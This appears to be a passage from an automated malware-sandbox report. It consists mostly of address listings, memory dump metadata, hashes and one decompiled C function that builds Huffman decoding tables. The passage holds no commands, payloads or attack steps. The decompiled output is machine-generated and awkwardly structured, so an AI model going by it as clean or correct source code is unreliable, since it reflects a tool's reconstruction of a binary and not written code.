                                                  0x00406354
                                                  0x00406354
                                                  0x00406354
                                                  0x00406358
                                                  0x00000000
                                                  0x00000000
                                                  0x0040635e
                                                  0x0040635e
                                                  0x00406361
                                                  0x00406364
                                                  0x00406369
                                                  0x0040636b
                                                  0x0040636e
                                                  0x00406371
                                                  0x00406374
                                                  0x00406374
                                                  0x00406377
                                                  0x00000000
                                                  0x00000000
                                                  0x00406379
                                                  0x00406379
                                                  0x0040637c
                                                  0x00406381
                                                  0x00406383
                                                  0x00406386
                                                  0x0040638c
                                                  0x004060eb
                                                  0x004060eb
                                                  0x004060ee
                                                  0x004060f4
                                                  0x004060fa
                                                  0x00406103
                                                  0x00406109
                                                  0x0040610c
                                                  0x00406113
                                                  0x00406118
                                                  0x0040611e
                                                  0x00406129
                                                  0x00406129
                                                  0x00406392
                                                  0x00406392
                                                  0x0040639c
                                                  0x00000000
                                                  0x00000000
                                                  0x004063a2
                                                  0x004063a2
                                                  0x004063a6
                                                  0x004063a9
                                                  0x004063a9
                                                  0x004063ad
                                                  0x004063b3
                                                  0x004063b3
                                                  0x004063b6
                                                  0x004063b9
                                                  0x004063bf
                                                  0x00000000
                                                  0x00000000
                                                  0x004063c1
                                                  0x004063e3
                                                  0x004063e3
                                                  0x004063e6
                                                  0x00000000
                                                  0x00000000
                                                  0x004063c3
                                                  0x004063c7
                                                  0x00000000
                                                  0x00000000
                                                  0x004063cd
                                                  0x004063cd
                                                  0x004063d0
                                                  0x004063d3
                                                  0x004063d8
                                                  0x004063da
                                                  0x004063dd
                                                  0x004063e0
                                                  0x004063e0
                                                  0x004063e8
                                                  0x004063e8
                                                  0x004063ee
                                                  0x004063f1
                                                  0x004063f4
                                                  0x004063f4
                                                  0x004063fb
                                                  0x004063ff
                                                  0x00406403
                                                  0x00406406
                                                  0x00406409
                                                  0x0040640f
                                                  0x00406414
                                                  0x00000000
                                                  0x00000000
                                                  0x00406416
                                                  0x0040642a
                                                  0x0040642a
                                                  0x0040642e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406418
                                                  0x0040641b
                                                  0x0040641b
                                                  0x00406422
                                                  0x00406427
                                                  0x00406427
                                                  0x00406427
                                                  0x00406430
                                                  0x00406430
                                                  0x00406433
                                                  0x00406441
                                                  0x00406447
                                                  0x0040644c
                                                  0x00406452
                                                  0x00406458
                                                  0x0040645e
                                                  0x00406465
                                                  0x00406479
                                                  0x00406479
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a4d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406085
                                                  0x00406085
                                                  0x00000000
                                                  0x00406680
                                                  0x00406680
                                                  0x00406684
                                                  0x00406687
                                                  0x0040668a
                                                  0x0040668d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406693
                                                  0x00406693
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066ba
                                                  0x00000000
                                                  0x00000000
                                                  0x00406698
                                                  0x00406698
                                                  0x0040669c
                                                  0x00000000
                                                  0x00000000
                                                  0x004066a2
                                                  0x004066a2
                                                  0x004066a5
                                                  0x004066a8
                                                  0x004066ab
                                                  0x004066ad
                                                  0x004066af
                                                  0x004066b2
                                                  0x004066b5
                                                  0x004066b5
                                                  0x004066b5
                                                  0x004066bc
                                                  0x004066bc
                                                  0x004066c4
                                                  0x004066c7
                                                  0x004066ca
                                                  0x004066cd
                                                  0x004066d1
                                                  0x004066d4
                                                  0x004066d6
                                                  0x004066d9
                                                  0x004066db
                                                  0x004066ef
                                                  0x004066ef
                                                  0x004066f2
                                                  0x0040670c
                                                  0x0040670c
                                                  0x0040670f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406715
                                                  0x00406715
                                                  0x00406718
                                                  0x00000000
                                                  0x00000000
                                                  0x0040671e
                                                  0x0040671e
                                                  0x00000000
                                                  0x0040671e
                                                  0x004066f4
                                                  0x004066f7
                                                  0x004066fe
                                                  0x00406701
                                                  0x00000000
                                                  0x00406701
                                                  0x004066dd
                                                  0x004066e1
                                                  0x004066e4
                                                  0x00000000
                                                  0x00000000
                                                  0x00406729
                                                  0x00406729
                                                  0x0040674e
                                                  0x0040674e
                                                  0x0040674e
                                                  0x00406750
                                                  0x00000000
                                                  0x00000000
                                                  0x0040672e
                                                  0x0040672e
                                                  0x00406732
                                                  0x00000000
                                                  0x00000000
                                                  0x00406738
                                                  0x00406738
                                                  0x0040673b
                                                  0x0040673e
                                                  0x00406741
                                                  0x00406743
                                                  0x00406745
                                                  0x00406748
                                                  0x0040674b
                                                  0x0040674b
                                                  0x0040674b
                                                  0x00406752
                                                  0x0040675a
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406762
                                                  0x00406765
                                                  0x00406765
                                                  0x00406767
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406771
                                                  0x00406774
                                                  0x00000000
                                                  0x00000000
                                                  0x0040677a
                                                  0x0040677a
                                                  0x0040679f
                                                  0x0040679f
                                                  0x0040679f
                                                  0x004067a1
                                                  0x00000000
                                                  0x00000000
                                                  0x0040677f
                                                  0x0040677f
                                                  0x00406783
                                                  0x00000000
                                                  0x00000000
                                                  0x00406789
                                                  0x00406789
                                                  0x0040678c
                                                  0x0040678f
                                                  0x00406792
                                                  0x00406794
                                                  0x00406796
                                                  0x00406799
                                                  0x0040679c
                                                  0x0040679c
                                                  0x0040679c
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067ab
                                                  0x004067ae
                                                  0x004067b1
                                                  0x004067b4
                                                  0x004067b8
                                                  0x004067bb
                                                  0x004067bd
                                                  0x004067c0
                                                  0x004067c3
                                                  0x004067dd
                                                  0x004067dd
                                                  0x004067e0
                                                  0x00000000
                                                  0x00000000
                                                  0x004067e6
                                                  0x004067e6
                                                  0x004067e9
                                                  0x004067f0
                                                  0x00000000
                                                  0x004067f0
                                                  0x004067c5
                                                  0x004067c8
                                                  0x004067cf
                                                  0x004067d2
                                                  0x00000000
                                                  0x00000000
                                                  0x004067f8
                                                  0x004067f8
                                                  0x0040681d
                                                  0x0040681d
                                                  0x0040681d
                                                  0x0040681f
                                                  0x00000000
                                                  0x00000000
                                                  0x004067fd
                                                  0x004067fd
                                                  0x00406801
                                                  0x00000000
                                                  0x00000000
                                                  0x00406807
                                                  0x00406807
                                                  0x0040680a
                                                  0x0040680d
                                                  0x00406810
                                                  0x00406812
                                                  0x00406814
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681a
                                                  0x0040681a
                                                  0x00406821
                                                  0x00406829
                                                  0x0040682c
                                                  0x0040682f
                                                  0x00406831
                                                  0x00406834
                                                  0x00406836
                                                  0x00000000
                                                  0x00000000
                                                  0x0040683c
                                                  0x0040683c
                                                  0x0040683f
                                                  0x00406840
                                                  0x00406841
                                                  0x00406843
                                                  0x00406847
                                                  0x00000000
                                                  0x00406942
                                                  0x00406942
                                                  0x00406945
                                                  0x00406948
                                                  0x0040694a
                                                  0x004069e1
                                                  0x004069e1
                                                  0x004069e4
                                                  0x004069e6
                                                  0x004069e7
                                                  0x004069e8
                                                  0x004069eb
                                                  0x00000000
                                                  0x004069eb
                                                  0x00406950
                                                  0x00406950
                                                  0x00406956
                                                  0x00406958
                                                  0x0040697d
                                                  0x00406980
                                                  0x00406986
                                                  0x0040698b
                                                  0x00406991
                                                  0x00406997
                                                  0x00406999
                                                  0x0040699c
                                                  0x004069a5
                                                  0x004069ab
                                                  0x004069ab
                                                  0x0040699e
                                                  0x004069a0
                                                  0x004069a2
                                                  0x004069a2
                                                  0x004069ad
                                                  0x004069b3
                                                  0x004069b5
                                                  0x004069b8
                                                  0x004069ba
                                                  0x004069c0
                                                  0x004069c2
                                                  0x004069c4
                                                  0x004069c6
                                                  0x004069c8
                                                  0x004069cb
                                                  0x004069d4
                                                  0x004069d7
                                                  0x004069d7
                                                  0x004069cd
                                                  0x004069cd
                                                  0x004069d0
                                                  0x004069d0
                                                  0x004069cb
                                                  0x004069c2
                                                  0x004069d9
                                                  0x004069db
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004069db
                                                  0x0040695a
                                                  0x0040695a
                                                  0x00406960
                                                  0x00406966
                                                  0x00406968
                                                  0x00000000
                                                  0x00000000
                                                  0x0040696a
                                                  0x0040696a
                                                  0x0040696c
                                                  0x0040696e
                                                  0x00406975
                                                  0x00406975
                                                  0x00406977
                                                  0x00406970
                                                  0x00406970
                                                  0x00406972
                                                  0x00406972
                                                  0x00406979
                                                  0x0040697b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004069f3
                                                  0x004069f3
                                                  0x004069f6
                                                  0x004069f8
                                                  0x004069fb
                                                  0x004069fe
                                                  0x004069fe
                                                  0x004069fe
                                                  0x004069fe
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004060ac
                                                  0x00406090
                                                  0x00000000
                                                  0x00406096
                                                  0x00406099
                                                  0x004060a3
                                                  0x004060a6
                                                  0x004060a9
                                                  0x00000000
                                                  0x004060a9
                                                  0x00406090
                                                  0x004060b4
                                                  0x004060b7
                                                  0x004060bb
                                                  0x004060c5
                                                  0x004060cf
                                                  0x004060d2
                                                  0x004060d8
                                                  0x0040620c
                                                  0x0040620e
                                                  0x00406214
                                                  0x00406217
                                                  0x0040621a
                                                  0x00000000
                                                  0x0040621a
                                                  0x004060de
                                                  0x004060de
                                                  0x004060df
                                                  0x00406137
                                                  0x00406137
                                                  0x0040613e
                                                  0x004061e4
                                                  0x004061e4
                                                  0x004061e9
                                                  0x004061ec
                                                  0x004061f1
                                                  0x004061f4
                                                  0x004061f9
                                                  0x004061fc
                                                  0x00406201
                                                  0x00406204
                                                  0x00406204
                                                  0x00000000
                                                  0x00406144
                                                  0x00406144
                                                  0x00406144
                                                  0x00406144
                                                  0x00406148
                                                  0x0040614d
                                                  0x0040614d
                                                  0x0040614d
                                                  0x00406152
                                                  0x00406154
                                                  0x00406156
                                                  0x0040615b
                                                  0x00406161
                                                  0x00406166
                                                  0x00406168
                                                  0x00406168
                                                  0x0040615d
                                                  0x0040615d
                                                  0x0040615d
                                                  0x0040615b
                                                  0x0040616a
                                                  0x0040616d
                                                  0x0040616f
                                                  0x00406172
                                                  0x00406172
                                                  0x004061a6
                                                  0x004061ab
                                                  0x004061ad
                                                  0x004061ae
                                                  0x004061b0
                                                  0x004061b1
                                                  0x004061b1
                                                  0x004061b1
                                                  0x004061d9
                                                  0x004061de
                                                  0x004061de
                                                  0x00000000
                                                  0x004061de
                                                  0x0040613e
                                                  0x004060e1
                                                  0x004060e1
                                                  0x004060e2
                                                  0x0040612c
                                                  0x00000000
                                                  0x0040612c
                                                  0x004060e4
                                                  0x004060e5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406241
                                                  0x00406241
                                                  0x00406241
                                                  0x00406244
                                                  0x00000000
                                                  0x00000000
                                                  0x00406221
                                                  0x00406221
                                                  0x00406225
                                                  0x00000000
                                                  0x00000000
                                                  0x0040622b
                                                  0x0040622b
                                                  0x0040622e
                                                  0x00406231
                                                  0x00406236
                                                  0x00406238
                                                  0x0040623b
                                                  0x0040623e
                                                  0x0040623e
                                                  0x0040623e
                                                  0x00406246
                                                  0x00406246
                                                  0x00406249
                                                  0x0040624b
                                                  0x00406250
                                                  0x00406253
                                                  0x00406255
                                                  0x00406258
                                                  0x00000000
                                                  0x00000000
                                                  0x0040625e
                                                  0x0040625e
                                                  0x00406260
                                                  0x00000000
                                                  0x00000000
                                                  0x00406266
                                                  0x00406266
                                                  0x0040626a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406270
                                                  0x00406270
                                                  0x00406273
                                                  0x00406275
                                                  0x00406313
                                                  0x00406313
                                                  0x00406316
                                                  0x00406318
                                                  0x00406318
                                                  0x0040631b
                                                  0x0040631e
                                                  0x00406320
                                                  0x00406322
                                                  0x00406324
                                                  0x00406324
                                                  0x0040632d
                                                  0x00406332
                                                  0x00406335
                                                  0x00406338
                                                  0x0040633b
                                                  0x0040633e
                                                  0x0040633e
                                                  0x0040633e
                                                  0x00406341
                                                  0x00406347
                                                  0x00406347
                                                  0x0040634d
                                                  0x0040634d
                                                  0x0040634d
                                                  0x00000000
                                                  0x00406341
                                                  0x0040627b
                                                  0x0040627b
                                                  0x00406281
                                                  0x00406284
                                                  0x00406286
                                                  0x004062b1
                                                  0x004062b4
                                                  0x004062ba
                                                  0x004062bf
                                                  0x004062c5
                                                  0x004062cb
                                                  0x004062cd
                                                  0x004062d0
                                                  0x004062d9
                                                  0x004062df
                                                  0x004062df
                                                  0x004062d2
                                                  0x004062d4
                                                  0x004062d6
                                                  0x004062d6
                                                  0x004062e1
                                                  0x004062e7
                                                  0x004062ea
                                                  0x004062ec
                                                  0x004062ee
                                                  0x004062f4
                                                  0x004062f6
                                                  0x004062f8
                                                  0x004062fb
                                                  0x00406304
                                                  0x00406304
                                                  0x00406306
                                                  0x004062fd
                                                  0x004062fd
                                                  0x00406300
                                                  0x00406300
                                                  0x00406308
                                                  0x00406308
                                                  0x004062f6
                                                  0x0040630b
                                                  0x0040630d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040630d
                                                  0x00406288
                                                  0x00406288
                                                  0x0040628e
                                                  0x00406294
                                                  0x00406296
                                                  0x00000000
                                                  0x00000000
                                                  0x00406298
                                                  0x00406298
                                                  0x0040629a
                                                  0x0040629c
                                                  0x0040629f
                                                  0x004062a6
                                                  0x004062a6
                                                  0x004062a8
                                                  0x004062a1
                                                  0x004062a1
                                                  0x004062a3
                                                  0x004062a3
                                                  0x004062aa
                                                  0x004062ac
                                                  0x004062af
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004063b3
                                                  0x004063b6
                                                  0x004063b9
                                                  0x004063bf
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406596
                                                  0x00406596
                                                  0x00406596
                                                  0x00406599
                                                  0x0040659c
                                                  0x0040659e
                                                  0x004065a1
                                                  0x004065a7
                                                  0x004065ae
                                                  0x004065b0
                                                  0x00000000
                                                  0x00000000
                                                  0x00406484
                                                  0x00406484
                                                  0x004064ac
                                                  0x004064ac
                                                  0x004064ac
                                                  0x004064ae
                                                  0x00000000
                                                  0x00000000
                                                  0x0040648c
                                                  0x0040648c
                                                  0x00406490
                                                  0x00000000
                                                  0x00000000
                                                  0x00406496
                                                  0x00406496
                                                  0x00406499
                                                  0x0040649c
                                                  0x0040649f
                                                  0x004064a1
                                                  0x004064a3
                                                  0x004064a6
                                                  0x004064a9
                                                  0x004064a9
                                                  0x004064a9
                                                  0x004064b0
                                                  0x004064b0
                                                  0x004064b8
                                                  0x004064bb
                                                  0x004064c1
                                                  0x004064c4
                                                  0x004064c8
                                                  0x004064cc
                                                  0x004064cf
                                                  0x004064d2
                                                  0x004064ea
                                                  0x004064ea
                                                  0x004064ed
                                                  0x004064fb
                                                  0x004064fe
                                                  0x004064ef
                                                  0x004064ef
                                                  0x004064f1
                                                  0x004064f8
                                                  0x004064f8
                                                  0x00406527
                                                  0x00406527
                                                  0x00406527
                                                  0x0040652a
                                                  0x0040652c
                                                  0x00000000
                                                  0x00000000
                                                  0x00406507
                                                  0x00406507
                                                  0x0040650b
                                                  0x00000000
                                                  0x00000000
                                                  0x00406511
                                                  0x00406511
                                                  0x00406514
                                                  0x00406517
                                                  0x0040651a
                                                  0x0040651c
                                                  0x0040651e
                                                  0x00406521
                                                  0x00406524
                                                  0x00406524
                                                  0x00406524
                                                  0x0040652e
                                                  0x0040652e
                                                  0x00406530
                                                  0x00406532
                                                  0x0040653d
                                                  0x00406540
                                                  0x00406543
                                                  0x00406545
                                                  0x00406547
                                                  0x00406549
                                                  0x0040654c
                                                  0x0040654f
                                                  0x00406554
                                                  0x00406557
                                                  0x0040655a
                                                  0x0040655d
                                                  0x00406564
                                                  0x00406567
                                                  0x00406569
                                                  0x00000000
                                                  0x00000000
                                                  0x0040656f
                                                  0x0040656f
                                                  0x00406573
                                                  0x00406584
                                                  0x00406584
                                                  0x00406584
                                                  0x00406586
                                                  0x00406586
                                                  0x0040658a
                                                  0x0040658a
                                                  0x0040658a
                                                  0x0040658c
                                                  0x0040658d
                                                  0x00406590
                                                  0x00406590
                                                  0x00406590
                                                  0x00406593
                                                  0x00000000
                                                  0x00406593
                                                  0x00406575
                                                  0x00406575
                                                  0x00406578
                                                  0x00000000
                                                  0x00000000
                                                  0x0040657e
                                                  0x0040657e
                                                  0x00000000
                                                  0x0040657e
                                                  0x004064d4
                                                  0x004064d4
                                                  0x004064d6
                                                  0x004064d8
                                                  0x004064db
                                                  0x004064de
                                                  0x004064e2
                                                  0x004064e2
                                                  0x004065b6
                                                  0x004065b6
                                                  0x004065b9
                                                  0x004065c0
                                                  0x004065c4
                                                  0x004065c6
                                                  0x004065c9
                                                  0x004065cc
                                                  0x004065d1
                                                  0x004065d4
                                                  0x004065d6
                                                  0x004065d7
                                                  0x004065da
                                                  0x004065e5
                                                  0x004065e8
                                                  0x004065ff
                                                  0x00406604
                                                  0x0040660b
                                                  0x00406610
                                                  0x00406614
                                                  0x00406616
                                                  0x00406616
                                                  0x00406616
                                                  0x00406619
                                                  0x0040661b
                                                  0x00000000
                                                  0x00406621
                                                  0x00406621
                                                  0x00406625
                                                  0x00406630
                                                  0x00406643
                                                  0x00406648
                                                  0x0040664d
                                                  0x0040664f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406655
                                                  0x00406655
                                                  0x00406658
                                                  0x0040665a
                                                  0x00406668
                                                  0x00406668
                                                  0x0040666b
                                                  0x0040666b
                                                  0x0040666e
                                                  0x00406671
                                                  0x00406674
                                                  0x00406677
                                                  0x0040667a
                                                  0x0040667d
                                                  0x00000000
                                                  0x0040667d
                                                  0x0040665c
                                                  0x0040665c
                                                  0x00406662
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406662
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a01
                                                  0x00406a01
                                                  0x00406a07
                                                  0x00406a0d
                                                  0x00406a12
                                                  0x00406a18
                                                  0x00406a1e
                                                  0x00406a20
                                                  0x00406a23
                                                  0x00406a2c
                                                  0x00406a32
                                                  0x00406a32
                                                  0x00406a25
                                                  0x00406a27
                                                  0x00406a29
                                                  0x00406a29
                                                  0x00406a34
                                                  0x00406a36
                                                  0x00406a39
                                                  0x00406a74
                                                  0x00406a74
                                                  0x00000000
                                                  0x00406a3b
                                                  0x00406a3b
                                                  0x00406a3b
                                                  0x00406a41
                                                  0x00406a44
                                                  0x00406a46
                                                  0x00406a7b
                                                  0x00406a7d
                                                  0x00000000
                                                  0x00406a7d
                                                  0x00000000
                                                  0x00406a46
                                                  0x00000000
                                                  0x00406085
                                                  0x00406a53
                                                  0x00000000
                                                  0x00406a53
                                                  0x00406467
                                                  0x00406469
                                                  0x00000000
                                                  0x00000000
                                                  0x0040646b
                                                  0x0040646b
                                                  0x0040646e
                                                  0x00000000
                                                  0x0040646e
                                                  0x004063b3
                                                  0x00406374
                                                  0x00406a58
                                                  0x00406a5b
                                                  0x00406a5d
                                                  0x00406a66
                                                  0x00406a6c
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                                                  • Instruction ID: 2fa80b96e0c3f2f9afba8e6e6bfd5b6e13d9d39ff7e82b1c07230a33620f403b
                                                  • Opcode Fuzzy Hash: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                                                  • Instruction Fuzzy Hash: 5BE1797190070ADFDB24CF58C980BAEBBF5EB45305F15892EE897A7291D338A991CF14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406B2B, Relevance: .3, Instructions: 300COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00406B2B(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42ceb8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42ceb8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42ceb8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                  0x00406b36
                                                  0x00406b3e
                                                  0x00406b42
                                                  0x00406b44
                                                  0x00406b47
                                                  0x00406b49
                                                  0x00406b49
                                                  0x00406b4b
                                                  0x00406b52
                                                  0x00406b54
                                                  0x00406b54
                                                  0x00406b5a
                                                  0x00406b6f
                                                  0x00406b77
                                                  0x00406b79
                                                  0x00406b7b
                                                  0x00406b7e
                                                  0x00406b7f
                                                  0x00406b7f
                                                  0x00406b85
                                                  0x00000000
                                                  0x00000000
                                                  0x00406b87
                                                  0x00406b8a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406b8a
                                                  0x00406b8e
                                                  0x00406b91
                                                  0x00406b93
